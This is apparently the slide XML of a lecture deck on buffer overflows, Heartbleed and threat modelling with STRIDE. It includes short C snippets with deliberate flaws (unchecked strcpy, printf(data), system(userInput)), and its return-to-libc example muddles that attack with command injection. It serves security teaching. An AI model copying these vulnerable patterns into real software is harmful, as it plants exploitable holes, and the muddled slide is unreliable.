          <p:cNvPr id="1228" name="Google Shape;1228;p83"/>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Buffer Overflow Exploitation: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entered password overflows the password buffer and overwrites adjacent memory, including the return address on the stack.</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Authentication Bypass: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Since the return address is overwritten, the program may not return to the correct location, leading to unexpected behavior. An attacker could craft the input to manipulate the program's control flow and potentially bypass authentication.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 this scenario, the buffer overflow allowed the attacker to manipulate the program's memory and execute unintended behavior, such as bypassing authentication. In real-world scenarios, attackers might leverage buffer overflows to inject and execute malicious code, leading to unauthorized access or control over a system. This underscores the importance of secure coding practices and input validation to prevent such vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1229" name="Google Shape;1229;p8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8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35" name="Google Shape;1235;p8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36" name="Google Shape;1236;p8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37" name="Google Shape;1237;p8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38" name="Google Shape;1238;p8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39" name="Google Shape;1239;p8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40" name="Google Shape;1240;p8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241" name="Google Shape;1241;p8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242" name="Google Shape;1242;p8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Types of BUFFER OVERFLOW</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1243" name="Google Shape;1243;p84"/>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216000"/>
              </a:lnSpc>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Stack-based Buffer Overflow:</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occurs when data overflows from a buffer located on the call stack. The call stack is a region of memory used to manage function calls and local variables.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Heap-based Buffer Overflow:</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occurs when data overflows from a buffer in the heap memory, which is used for dynamic memory allocation during program execution.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Format String Overflow:</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 this type of attack, the attacker exploits vulnerabilities related to improper use of format string specifiers in certain functions like printf or sprintf.</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Return-to-libc Attack:</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This attack involves redirecting the program's control flow to existing code fragments, typically in the C library (libc), to execute malicious actions without injecting new code.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1244" name="Google Shape;1244;p8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sp>
        <p:nvSpPr>
          <p:cNvPr id="1249" name="Google Shape;1249;p8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50" name="Google Shape;1250;p8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51" name="Google Shape;1251;p8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52" name="Google Shape;1252;p8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53" name="Google Shape;1253;p8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54" name="Google Shape;1254;p8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55" name="Google Shape;1255;p8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256" name="Google Shape;1256;p8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257" name="Google Shape;1257;p8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Types of BUFFER OVERFLOW - Stack Based</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258" name="Google Shape;1258;p85"/>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Stack-based Buffer Overflow:</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Scenario: A web server application uses a stack-based buffer to store user input for processing HTTP requests. The application has a vulnerable function that lacks proper bounds checking.</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void processRequest(char *request)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char buffer[64];</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strcpy(buffer, request);  // Vulnerability: No bounds checking</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 Process the request...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 An attacker sends an HTTP request with a payload that exceeds the 64-byte limit, causing a stack-based buffer overflow and potentially overwriting the return address on the stack. This manipulation could lead to unauthorized code execution.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259" name="Google Shape;1259;p8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8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65" name="Google Shape;1265;p8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66" name="Google Shape;1266;p8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67" name="Google Shape;1267;p8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68" name="Google Shape;1268;p8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69" name="Google Shape;1269;p8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70" name="Google Shape;1270;p8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271" name="Google Shape;1271;p8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272" name="Google Shape;1272;p8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Types of BUFFER OVERFLOW - Heap Based</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1273" name="Google Shape;1273;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950"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Heap-based Buffer Overflow:</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Scenario: A media player application reads user-supplied metadata for audio files and stores it in a dynamically allocated buffer on the heap. The application has a vulnerability due to improper validation.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void processMetadata(char *metadata)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char *buffer = (char *)malloc(128);</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strcpy(buffer, metadata);  // Vulnerability: No bounds checking</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 Process the metadata...</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free(buffer);</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 An attacker crafts a malicious audio file with metadata that exceeds the allocated buffer size, causing a heap-based buffer overflow. This could lead to the compromise of the application's memory and execution of arbitrary code.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274" name="Google Shape;1274;p8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278"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1279" name="Google Shape;1279;p8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80" name="Google Shape;1280;p8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81" name="Google Shape;1281;p8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82" name="Google Shape;1282;p8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83" name="Google Shape;1283;p8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84" name="Google Shape;1284;p8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285" name="Google Shape;1285;p8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286" name="Google Shape;1286;p8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287" name="Google Shape;1287;p8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Types of BUFFER OVERFLOW - Format String</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1288" name="Google Shape;1288;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950"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Format String Overflow:</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Scenario: A logging function in a network service prints user-controlled data using a format string without proper validation.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void logData(char *data)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printf(data);  // Vulnerability: Format string without proper validation</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 An attacker supplies a carefully crafted format string that contains format specifiers ("%x", "%n", etc.) in the data input. If the application does not validate or sanitize the input, the attacker could exploit this vulnerability to leak sensitive information or overwrite memory.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289" name="Google Shape;1289;p8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8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295" name="Google Shape;1295;p8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296" name="Google Shape;1296;p8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297" name="Google Shape;1297;p8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298" name="Google Shape;1298;p8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299" name="Google Shape;1299;p8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300" name="Google Shape;1300;p8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01" name="Google Shape;1301;p8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02" name="Google Shape;1302;p8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Types of BUFFER OVERFLOW - Format String</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1303" name="Google Shape;1303;p88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950"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Return-to-libc Attack:</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Scenario: A server application uses the system function to execute system commands based on user input without proper validation.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void executeCommand(char *userInput)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    system(userInput);  // Vulnerability: Executes user-controlled input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Attack: An attacker provides input that includes a sequence of instructions to call existing functions in the C library (libc). By manipulating the return address, the attacker can divert the control flow to execute specific library functions, potentially gaining control over the system.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1304" name="Google Shape;1304;p8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8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10" name="Google Shape;1310;p8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311" name="Google Shape;1311;p8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312" name="Google Shape;1312;p8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313" name="Google Shape;1313;p8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314" name="Google Shape;1314;p8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315" name="Google Shape;1315;p8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16" name="Google Shape;1316;p8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17" name="Google Shape;1317;p8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the attack happens</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1318" name="Google Shape;1318;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950"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attacker identifies a vulnerable program and determines the input required to trigger the buffer overflow.</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They create a malicious payload, often containing machine code instructions, and craft an input that surpasses the buffer's allocated size.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When the vulnerable function is called, the buffer overflows, overwriting adjacent memory, including the function's return address on the stack.</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overwritten return address is manipulated to point to the attacker's payload.</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Upon returning from the vulnerable function, the program unwittingly executes the attacker's code.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319" name="Google Shape;1319;p8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23"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1324" name="Google Shape;1324;p9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25" name="Google Shape;1325;p9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326" name="Google Shape;1326;p9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327" name="Google Shape;1327;p9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328" name="Google Shape;1328;p9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329" name="Google Shape;1329;p9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330" name="Google Shape;1330;p9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31" name="Google Shape;1331;p9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32" name="Google Shape;1332;p9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the attack happens</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1333" name="Google Shape;1333;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950" cy="24456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To prevent buffer overflow attacks, developers should use secure coding practices, perform bounds checking, and implement various mitigation techniques, such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR). </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Additionally, languages like Rust and modern versions of C and C++ provide safer alternatives and tools to prevent such vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1334" name="Google Shape;1334;p9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9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40" name="Google Shape;1340;p9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341" name="Google Shape;1341;p9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342" name="Google Shape;1342;p9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343" name="Google Shape;1343;p9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344" name="Google Shape;1344;p9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345" name="Google Shape;1345;p9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46" name="Google Shape;1346;p9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47" name="Google Shape;1347;p9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BUFFER OVERFLOW - HeartBleed 2014</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1348" name="Google Shape;1348;p91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950"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Heartbleed was a critical security vulnerability that affected the OpenSSL cryptographic software library, a widely used open-source implementation of the SSL/TLS protocols for securing internet communication. The vulnerability was discovered in April 2014, and it attracted significant attention due to its potential impact on a large portion of secure websites and online services.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Explanation of Heartbleed:</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Vulnerability Overview:</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Heartbleed vulnerability, formally known as CVE-2014-0160, was a result of a coding error in the OpenSSL library's implementation of the TLS/DTLS heartbeat extension.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Heartbeat Extension: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TLS/DTLS heartbeat extension is designed to keep a secure connection alive by periodically sending a small piece of data (a heartbeat) from one end of the connection to the other. The recipient responds by echoing back the received data.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1349" name="Google Shape;1349;p9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99" name="Google Shape;199;p2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00" name="Google Shape;200;p2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01" name="Google Shape;201;p2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02" name="Google Shape;202;p2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03" name="Google Shape;203;p2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04" name="Google Shape;204;p2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05" name="Google Shape;205;p2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06" name="Google Shape;206;p2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TECHNIQUES</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207" name="Google Shape;207;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="2124075"/>
            <a:ext cx="8724165" cy="39029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Medium"/>
                <a:ea typeface="Roboto Condensed Medium"/>
                <a:cs typeface="Roboto Condensed Medium"/>
                <a:sym typeface="Roboto Condensed Medium"/>
              </a:rPr>
              <a:t>Techniques refer to specific methods, procedures, or approaches used by cyber threat actors (hackers) to compromise or exploit computer systems, networks, and data. Cybersecurity techniques encompass a wide range of actions and strategies employed by attackers to achieve their objectives ETHICAL OR UNETHICAL.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Google Shape;208;p2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
        <p:nvSpPr>
          <p:cNvPr id="209" name="Google Shape;209;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10609118" y="2085975"/>
            <a:ext cx="6650182" cy="4114800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6650182" h="4114800" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6650182" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6650182" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>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3"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1354" name="Google Shape;1354;p9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55" name="Google Shape;1355;p9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356" name="Google Shape;1356;p9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357" name="Google Shape;1357;p9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358" name="Google Shape;1358;p9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359" name="Google Shape;1359;p9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360" name="Google Shape;1360;p9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61" name="Google Shape;1361;p9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62" name="Google Shape;1362;p9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BUFFER OVERFLOW - HeartBleed 2014</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1363" name="Google Shape;1363;p92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950"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Buffer Overflow:</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vulnerability in Heartbleed occurred due to a lack of proper bounds checking in the handling of the heartbeat extension. Specifically, the extension allowed the sender to specify the length of the data to be sent back in the response. However, inadequate validation of the length field led to a buffer over-read vulnerability.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Exploitation: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An attacker could craft a malicious heartbeat request and send it to a vulnerable server. By specifying a length field that was longer than the actual data provided, the server would inadvertently respond with more data than it should. This excess data could include sensitive information from the server's memory, such as encryption keys, user credentials, and other confidential data.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1364" name="Google Shape;1364;p9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9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70" name="Google Shape;1370;p9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371" name="Google Shape;1371;p9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372" name="Google Shape;1372;p9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373" name="Google Shape;1373;p9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374" name="Google Shape;1374;p9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375" name="Google Shape;1375;p9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76" name="Google Shape;1376;p9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77" name="Google Shape;1377;p9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 BUFFER OVERFLOW - HeartBleed 2014</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1378" name="Google Shape;1378;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950"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Impact:</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Heartbleed had the potential to expose sensitive information without leaving any trace of the breach. Since the vulnerability existed at the protocol level, it affected a vast number of websites, services, and devices that utilized OpenSSL for secure communication.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Response and Mitigation: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Once the Heartbleed vulnerability was publicly disclosed, there was a rush to patch affected systems and revoke and reissue SSL/TLS certificates. Many organizations also recommended that users change their passwords on affected sites. The incident prompted a reevaluation of security practices and increased awareness of the importance of promptly addressing critical vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1379" name="Google Shape;1379;p9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83"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1384" name="Google Shape;1384;p9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385" name="Google Shape;1385;p9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386" name="Google Shape;1386;p9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387" name="Google Shape;1387;p9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388" name="Google Shape;1388;p9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389" name="Google Shape;1389;p9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390" name="Google Shape;1390;p9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391" name="Google Shape;1391;p9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392" name="Google Shape;1392;p9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THREAT MODELLING</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1393" name="Google Shape;1393;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950"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Threat modeling is a structured process used in information security and software development to identify, assess, and prioritize potential threats or risks to a system, application, or organization. </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goal is to understand potential vulnerabilities and weaknesses in order to implement effective security measures and countermeasures.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Organizations can proactively enhance the security of their systems and reduce the likelihood of successful attacks. Threat modeling is a crucial aspect of developing and maintaining secure systems in the ever-evolving landscape of cybersecurity.</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 comprehensive threat model helps your organization proactively manage and enhance the security of its systems.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1394" name="Google Shape;1394;p9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sp>
        <p:nvSpPr>
          <p:cNvPr id="1399" name="Google Shape;1399;p95"/>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400" name="Google Shape;1400;p95"/>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01" name="Google Shape;1401;p95"/>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02" name="Google Shape;1402;p95"/>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03" name="Google Shape;1403;p95"/>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04" name="Google Shape;1404;p95"/>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05" name="Google Shape;1405;p95"/>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06" name="Google Shape;1406;p95"/>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07" name="Google Shape;1407;p95"/>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to develop a Threat Model</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1408" name="Google Shape;1408;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950" cy="82749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Scenario: Online Banking System</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Identify Assets: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Start by identifying the assets you want to protect. In the case of an online banking system, these could include customer accounts, financial transactions, user credentials, and sensitive personal information.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Identify Threats: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Enumerate potential threats or vulnerabilities that could compromise the identified assets. For our online banking system, threats might include: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Unauthorized access:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Someone gaining unauthorized access to user accounts.</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Phishing attacks:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Attempts to trick users into revealing their login credentials.</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Data interception:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Eavesdropping on communication between the user and the server.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="sng" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Insider threats: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Malicious actions by employees or trusted individuals.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1409" name="Google Shape;1409;p95"/>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96"/>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415" name="Google Shape;1415;p96"/>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16" name="Google Shape;1416;p96"/>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17" name="Google Shape;1417;p96"/>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18" name="Google Shape;1418;p96"/>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19" name="Google Shape;1419;p96"/>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20" name="Google Shape;1420;p96"/>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21" name="Google Shape;1421;p96"/>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22" name="Google Shape;1422;p96"/>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to develop a Threat Model</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1423" name="Google Shape;1423;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950" cy="778916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Assess Vulnerabilities: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Analyze the system to identify vulnerabilities that could be exploited by the identified threats. For example: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Weak authentication mechanisms.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Lack of encryption for sensitive data in transit.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Inadequate access controls.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Prioritize Risks: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Prioritize the identified risks based on their potential impact and likelihood. Not all threats are equally critical. In the case of our online banking system, unauthorized access and data interception may pose higher risks than less probable threats.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424" name="Google Shape;1424;p96"/>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28"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1429" name="Google Shape;1429;p97"/>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430" name="Google Shape;1430;p97"/>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31" name="Google Shape;1431;p97"/>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32" name="Google Shape;1432;p97"/>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33" name="Google Shape;1433;p97"/>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34" name="Google Shape;1434;p97"/>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35" name="Google Shape;1435;p97"/>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36" name="Google Shape;1436;p97"/>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37" name="Google Shape;1437;p97"/>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to develop a Threat Model</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1438" name="Google Shape;1438;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950"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Develop Mitigation Strategies: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Devise strategies and countermeasures to mitigate the identified risks. This could involve implementing:</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Strong authentication methods.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Encryption protocols for data in transit.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Access controls to limit privileges.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Review and Update:</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Regularly review and update the threat model as the system evolves or new threats emerge. Technology changes, and so do potential risks.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439" name="Google Shape;1439;p97"/>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98"/>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445" name="Google Shape;1445;p98"/>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46" name="Google Shape;1446;p98"/>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47" name="Google Shape;1447;p98"/>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48" name="Google Shape;1448;p98"/>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49" name="Google Shape;1449;p98"/>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50" name="Google Shape;1450;p98"/>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51" name="Google Shape;1451;p98"/>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52" name="Google Shape;1452;p98"/>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How to develop a Threat Model</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1453" name="Google Shape;1453;p98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950" cy="68176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Develop Mitigation Strategies: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Devise strategies and countermeasures to mitigate the identified risks. This could involve implementing:</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Strong authentication methods.</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Encryption protocols for data in transit.</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Access controls to limit privileges.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Review and Update:</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Regularly review and update the threat model as the system evolves or new threats emerge. Technology changes, and so do potential risks.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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1454" name="Google Shape;1454;p98"/>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458"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1459" name="Google Shape;1459;p99"/>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460" name="Google Shape;1460;p99"/>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61" name="Google Shape;1461;p99"/>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62" name="Google Shape;1462;p99"/>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63" name="Google Shape;1463;p99"/>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64" name="Google Shape;1464;p99"/>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65" name="Google Shape;1465;p99"/>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66" name="Google Shape;1466;p99"/>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67" name="Google Shape;1467;p99"/>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Threat Models</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1468" name="Google Shape;1468;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950" cy="53602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sng" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>STRIDE:</a:t>
            </a:r>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Developed by Microsoft, STRIDE categorizes threats into six main categories: Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. It is widely used for analyzing security risks in software development.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Spoofing:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Involves attempts to impersonate users or systems.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Tampering:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Refers to unauthorized modification of data or systems.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Repudiation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Occurs when actions are falsely disclaimed or denied.</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Information Disclosure:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Involves the exposure of sensitive information.</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Denial of Service:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Aims to disrupt or degrade the availability of a system.</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Elevation of Privilege:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
